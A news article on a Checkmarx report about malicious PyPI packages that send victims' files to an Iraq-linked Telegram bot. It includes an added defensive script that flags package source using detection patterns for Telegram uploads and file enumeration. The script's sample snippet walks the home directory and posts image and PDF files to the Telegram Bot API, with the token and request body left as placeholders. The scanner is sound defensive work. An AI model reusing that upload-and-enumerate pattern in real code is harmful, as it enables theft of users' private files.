Iraq-based cybercriminals have been deploying malicious Python packages through the popular PyPI repository, according to a report by cybersecurity firm Checkmarx. The attackers use these packages to exfiltrate sensitive user data, sending it to a Telegram chatbot linked to various cybercriminal activities based in Iraq. The bot, which has been active since 2022, contains over 90,000 messages and is involved in activities such as financial theft and purchasing social media engagements.
The malicious script embedded in the Python packages scans victims’ devices for files and photos with specific extensions before sending them to the attackers via Telegram. The user who uploaded these packages is known by the nickname “dsfsdfds.” Checkmarx researchers noted that the bot’s operators are likely based in Iraq and have been involved in multiple criminal operations.
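The pattern the report describes, local file enumeration by extension paired with an upload to the Telegram Bot API, is something a package reviewer can look for before installing an untrusted dependency. The following is an added example written for this page, not code from Checkmarx or from the packages in question: a small static triage check over Python source text. The indicator regexes, the scoring rule and the sample snippets are all constructed assumptions for illustration; the actual packages may use different calls and extensions.

```python
"""Added example (not from the Checkmarx report): a heuristic static triage of
Python package source for the combination of local file enumeration and a
Telegram Bot API upload. Indicators and samples are constructed assumptions."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Heuristic indicators (assumed, not taken from the report). Non-capturing
# groups keep re.findall returning whole matches.
INDICATORS: dict[str, re.Pattern[str]] = {
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot"),
    "telegram_send_document": re.compile(r"sendDocument|send_document"),
    "filesystem_walk": re.compile(r"os\.walk\(|Path\([^)]*\)\.rglob\(|glob\.glob\("),
    "extension_filter": re.compile(
        r"\.endswith\(\s*\(?\s*['\"]\.(?:jpg|jpeg|png|pdf|txt|docx?)['\"]"
    ),
    "home_directory": re.compile(
        r"expanduser\(\s*['\"]~['\"]\s*\)|os\.environ\[['\"]HOME['\"]\]"
    ),
}


@dataclass
class TriageResult:
    hits: dict[str, int] = field(default_factory=dict)  # indicator -> match count
    verdict: str = "clean"  # "clean", "review" or "suspicious"


def _verdict(hits: dict[str, int]) -> str:
    # Either half alone is common in benign code (backup tools, bots);
    # enumeration plus an outbound Telegram upload together is the red flag.
    exfil = "telegram_bot_api" in hits or "telegram_send_document" in hits
    enum = "filesystem_walk" in hits or "extension_filter" in hits
    if exfil and enum:
        return "suspicious"
    if exfil or enum:
        return "review"
    return "clean"


def triage_source(source: str) -> TriageResult:
    """Count indicator matches in one source file and derive a verdict."""
    result = TriageResult()
    for name, pattern in INDICATORS.items():
        count = len(pattern.findall(source))
        if count:
            result.hits[name] = count
    result.verdict = _verdict(result.hits)
    return result


def triage_package(files: dict[str, str]) -> TriageResult:
    """Aggregate over a package's files, since the two halves of the pattern
    may be split across modules (e.g. a walker in one file, the upload in
    another). `files` maps a path to its source text."""
    merged = TriageResult()
    for text in files.values():
        for name, count in triage_source(text).hits.items():
            merged.hits[name] = merged.hits.get(name, 0) + count
    merged.verdict = _verdict(merged.hits)
    return merged


# Constructed sample inputs (not real package code). The upload URL uses a
# placeholder and the request body is elided on purpose.
SUSPICIOUS_SAMPLE = '''
import os
for root, dirs, files in os.walk(os.path.expanduser("~")):
    for name in files:
        if name.endswith((".jpg", ".pdf")):
            post("https://api.telegram.org/bot<PLACEHOLDER_TOKEN>/sendDocument", ...)
'''

BENIGN_SAMPLE = '''
import os
total = 0
for root, dirs, files in os.walk("."):
    total += len(files)
print(total)
'''

if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        r = triage_source(text)
        print(f"{label}: verdict={r.verdict} hits={r.hits}")
```

Run it on an extracted sdist or wheel by reading each `.py` file into the dict passed to `triage_package`; a "suspicious" verdict is a prompt for manual review of the install hooks and network calls, not proof of malice.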
Checkmarx gained access to the Telegram bot, allowing them to monitor its activities. This access revealed that some of the campaigns using these malicious packages were successful, indicating a well-established criminal ecosystem. The researchers uncovered that what initially seemed like isolated incidents of malicious activity were part of a broader, more organized effort.
While the full extent of the data stolen and the specific targets remain unclear, the findings highlight the significant threat posed by these malicious packages. Checkmarx’s report underscores the importance of vigilance and security in the open-source software community, as these cybercriminals continue to exploit popular platforms like PyPI for their nefarious activities.